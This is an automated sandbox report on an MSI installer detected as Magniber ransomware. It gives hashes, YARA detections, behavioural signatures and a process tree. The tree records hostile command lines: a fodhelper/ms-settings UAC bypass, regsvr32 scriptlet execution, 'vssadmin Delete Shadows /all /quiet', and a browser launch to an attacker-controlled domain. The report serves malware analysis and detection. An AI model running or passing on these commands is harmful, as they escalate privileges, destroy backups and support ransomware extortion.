Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
14-09-2022 23:15
Static task
static1
Behavioral task
behavioral1
Sample
ddf798fa09f7c72f9fec4478841990d7.msi
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
ddf798fa09f7c72f9fec4478841990d7.msi
Resource
win10v2004-20220812-en
General
-
Target
ddf798fa09f7c72f9fec4478841990d7.msi
-
Size
92KB
-
MD5
ddf798fa09f7c72f9fec4478841990d7
-
SHA1
42b8bc580bd77c330432fb7cf6d9b8c8212961bd
-
SHA256
b2b07b32c681a44c647814d09eeac5d691ae67ebf1862bd23c639fce7027685a
-
SHA512
fa39bd42f000e8dffb4638a65cb08ab0f4393a7ed8ef718efa7f3652c00cd1aa31c6f3fb5365674700a08eb066d3e514e7f8131fce0bccd9b5897ea96c9b2425
-
SSDEEP
768:8lUJ5BxTORGx4/dpZ6G+jzI/RyGwaW27N5MSdm4cyWMDC/yWMDCmYinj:hxTcdpZ6G//RzwaN1d00DU0D37n
Malware Config
Extracted
C:\Users\Admin\AppData\Local\Temp\3064_104092216\us_tv_and_film.txt
Signatures
-
Detect magniber ransomware 2 IoCs
resource yara_rule behavioral2/memory/1928-148-0x000001ADDF6E0000-0x000001ADDF6EC000-memory.dmp family_magniber behavioral2/memory/2408-149-0x000001D172BC0000-0x000001D172BC3000-memory.dmp family_magniber -
Magniber Ransomware
Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Blocklisted process makes network request 3 IoCs
flow pid Process 8 4888 msiexec.exe 9 4888 msiexec.exe 11 4888 msiexec.exe -
Modifies extensions of user files 6 IoCs
Ransomware generally changes the extension on encrypted files.
description ioc Process File renamed C:\Users\Admin\Pictures\SendSync.tiff => C:\Users\Admin\Pictures\SendSync.tiff.vpkrzajx MsiExec.exe File renamed C:\Users\Admin\Pictures\LockBackup.raw => C:\Users\Admin\Pictures\LockBackup.raw.vpkrzajx MsiExec.exe File renamed C:\Users\Admin\Pictures\GroupResolve.png => C:\Users\Admin\Pictures\GroupResolve.png.vpkrzajx MsiExec.exe File renamed C:\Users\Admin\Pictures\HideApprove.png => C:\Users\Admin\Pictures\HideApprove.png.vpkrzajx MsiExec.exe File renamed C:\Users\Admin\Pictures\LockInitialize.png => C:\Users\Admin\Pictures\LockInitialize.png.vpkrzajx MsiExec.exe File opened for modification C:\Users\Admin\Pictures\SendSync.tiff MsiExec.exe -
Loads dropped DLL 1 IoCs
pid Process 1928 MsiExec.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1928 set thread context of 2408 1928 MsiExec.exe 55 PID 1928 set thread context of 2448 1928 MsiExec.exe 54 PID 1928 set thread context of 2744 1928 MsiExec.exe 35 -
Drops file in Program Files directory 2 IoCs
description ioc Process File created C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\d7749718-9762-451c-9113-9b7e51bca10e.tmp setup.exe File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220915011550.pma setup.exe -
Drops file in Windows directory 9 IoCs
description ioc Process File created C:\Windows\Installer\e56d69e.msi msiexec.exe File opened for modification C:\Windows\Installer\e56d69e.msi msiexec.exe File opened for modification C:\Windows\Installer\MSID7E6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIDCC9.tmp msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File created C:\Windows\Installer\SourceHash{0311111A-8CE9-4820-9F74-1D1FFF54BBAB} msiexec.exe File created C:\Windows\Installer\e56d6a0.msi msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 0000000004000000789d96067ff55f5b0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff000000002701010000080000789d96060000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3f000000ffffffff000000000700010000680900789d9606000000000000d0120000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000789d960600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000789d960600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters vssvc.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5672 vssadmin.exe 5708 vssadmin.exe 5740 vssadmin.exe 2984 vssadmin.exe 3240 vssadmin.exe 4280 vssadmin.exe -
Modifies registry class 15 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1" sihost.exe Set value (int) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.MicrosoftEdge.Stable_8wekyb3d8bbwe\WasEverActivated = "1" sihost.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55" regsvr32.exe Key created \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\ = "regsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a55" regsvr32.exe Set value (str) \REGISTRY\USER\S-1-5-21-2629973501-4017243118-3254762364-1000_Classes\ms-settings\shell\open\command\DelegateExecute regsvr32.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 1952 msiexec.exe 1952 msiexec.exe 1928 MsiExec.exe 1928 MsiExec.exe 4260 msedge.exe 4260 msedge.exe 3064 msedge.exe 3064 msedge.exe 3560 identity_helper.exe 3560 identity_helper.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 1928 MsiExec.exe 1928 MsiExec.exe 1928 MsiExec.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
pid Process 3064 msedge.exe 3064 msedge.exe 3064 msedge.exe 3064 msedge.exe 3064 msedge.exe 3064 msedge.exe 3064 msedge.exe 3064 msedge.exe 3064 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 4888 msiexec.exe Token: SeIncreaseQuotaPrivilege 4888 msiexec.exe Token: SeSecurityPrivilege 1952 msiexec.exe Token: SeCreateTokenPrivilege 4888 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 4888 msiexec.exe Token: SeLockMemoryPrivilege 4888 msiexec.exe Token: SeIncreaseQuotaPrivilege 4888 msiexec.exe Token: SeMachineAccountPrivilege 4888 msiexec.exe Token: SeTcbPrivilege 4888 msiexec.exe Token: SeSecurityPrivilege 4888 msiexec.exe Token: SeTakeOwnershipPrivilege 4888 msiexec.exe Token: SeLoadDriverPrivilege 4888 msiexec.exe Token: SeSystemProfilePrivilege 4888 msiexec.exe Token: SeSystemtimePrivilege 4888 msiexec.exe Token: SeProfSingleProcessPrivilege 4888 msiexec.exe Token: SeIncBasePriorityPrivilege 4888 msiexec.exe Token: SeCreatePagefilePrivilege 4888 msiexec.exe Token: SeCreatePermanentPrivilege 4888 msiexec.exe Token: SeBackupPrivilege 4888 msiexec.exe Token: SeRestorePrivilege 4888 msiexec.exe Token: SeShutdownPrivilege 4888 msiexec.exe Token: SeDebugPrivilege 4888 msiexec.exe Token: SeAuditPrivilege 4888 msiexec.exe Token: SeSystemEnvironmentPrivilege 4888 msiexec.exe Token: SeChangeNotifyPrivilege 4888 msiexec.exe Token: SeRemoteShutdownPrivilege 4888 msiexec.exe Token: SeUndockPrivilege 4888 msiexec.exe Token: SeSyncAgentPrivilege 4888 msiexec.exe Token: SeEnableDelegationPrivilege 4888 msiexec.exe Token: SeManageVolumePrivilege 4888 msiexec.exe Token: SeImpersonatePrivilege 4888 msiexec.exe Token: SeCreateGlobalPrivilege 4888 msiexec.exe Token: SeBackupPrivilege 4960 vssvc.exe Token: SeRestorePrivilege 4960 vssvc.exe Token: SeAuditPrivilege 4960 vssvc.exe Token: SeBackupPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe Token: SeTakeOwnershipPrivilege 1952 msiexec.exe Token: SeRestorePrivilege 1952 msiexec.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 4888 msiexec.exe 4888 msiexec.exe 3064 msedge.exe 3064 msedge.exe 3064 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1952 wrote to memory of 4264 1952 msiexec.exe 91 PID 1952 wrote to memory of 4264 1952 msiexec.exe 91 PID 1952 wrote to memory of 1928 1952 msiexec.exe 93 PID 1952 wrote to memory of 1928 1952 msiexec.exe 93 PID 2408 wrote to memory of 2656 2408 sihost.exe 96 PID 2408 wrote to memory of 2656 2408 sihost.exe 96 PID 2448 wrote to memory of 4976 2448 svchost.exe 94 PID 2448 wrote to memory of 4976 2448 svchost.exe 94 PID 2744 wrote to memory of 1652 2744 taskhostw.exe 95 PID 2744 wrote to memory of 1652 2744 taskhostw.exe 95 PID 1928 wrote to memory of 4468 1928 MsiExec.exe 98 PID 1928 wrote to memory of 4468 1928 MsiExec.exe 98 PID 4468 wrote to memory of 3064 4468 cmd.exe 100 PID 4468 wrote to memory of 3064 4468 cmd.exe 100 PID 3064 wrote to memory of 2184 3064 msedge.exe 102 PID 3064 wrote to memory of 2184 3064 msedge.exe 102 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 528 3064 msedge.exe 105 PID 3064 wrote to memory of 4260 3064 msedge.exe 106 PID 3064 wrote to memory of 4260 3064 msedge.exe 106 PID 3064 wrote to memory of 1712 3064 msedge.exe 108 PID 3064 wrote to memory of 1712 3064 msedge.exe 108 PID 3064 wrote to memory of 1712 3064 msedge.exe 108 PID 3064 wrote to memory of 1712 3064 msedge.exe 108 PID 3064 wrote to memory of 1712 3064 msedge.exe 108 PID 3064 wrote to memory of 1712 3064 msedge.exe 108
Processes
-
C:\Windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}1⤵
- Suspicious use of WriteProcessMemory
PID:2744 -
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea2⤵
- Modifies registry class
PID:1652
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:3904
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:3556
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a554⤵PID:1496
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:4280
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:5276
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:5440
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a554⤵PID:5572
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:5740
-
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵
- Suspicious use of WriteProcessMemory
PID:2448 -
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea2⤵
- Modifies registry class
PID:4976
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:3672
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:2756
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a554⤵PID:1600
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:3240
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:5252
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:5412
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a554⤵PID:5552
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:5708
-
-
-
-
-
C:\Windows\system32\sihost.exesihost.exe1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2408 -
C:\Windows\system32\regsvr32.exeregsvr32.exe scrobj.dll /s /u /n /i:../../../Users/Public/bjsocea2⤵
- Modifies registry class
PID:2656
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:4300
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:2252
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a554⤵PID:3568
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:2984
-
-
-
-
-
C:\Windows\system32\cmd.execmd /c "start fodhelper.exe"2⤵PID:5260
-
C:\Windows\system32\fodhelper.exefodhelper.exe3⤵PID:5400
-
C:\Windows\system32\regsvr32.exe"regsvr32.exe" scrobj.dll /s /u /n /i:../../../Users/Public/w8q31a554⤵PID:5528
-
C:\Windows\System32\vssadmin.exe"C:\Windows\System32\vssadmin.exe" Delete Shadows /all /quiet5⤵
- Interacts with shadow copies
PID:5672
-
-
-
-
-
C:\Windows\system32\msiexec.exemsiexec.exe /I C:\Users\Admin\AppData\Local\Temp\ddf798fa09f7c72f9fec4478841990d7.msi1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4888
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1952 -
C:\Windows\system32\srtasks.exeC:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:22⤵PID:4264
-
-
C:\Windows\System32\MsiExec.exeC:\Windows\System32\MsiExec.exe -Embedding 0CB3A02F93E90B8853234F11696B31B82⤵
- Modifies extensions of user files
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Windows\System32\cmd.execmd /c "start microsoft-edge:http://48a8002834vpkrzajx.ridits.info/vpkrzajx^&1^&60119478^&75^&375^&22190413⤵
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument microsoft-edge:http://48a8002834vpkrzajx.ridits.info/vpkrzajx&1&60119478&75&375&22190414⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3064 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffad80d46f8,0x7ffad80d4708,0x7ffad80d47185⤵PID:2184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2208 /prefetch:25⤵PID:528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
PID:4260
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:85⤵PID:1712
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:15⤵PID:2008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3984 /prefetch:15⤵PID:1036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5356 /prefetch:85⤵PID:3792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:15⤵PID:388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2160,9318669571389617521,1121500821282271674,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4340 /prefetch:15⤵PID:1536
-
-
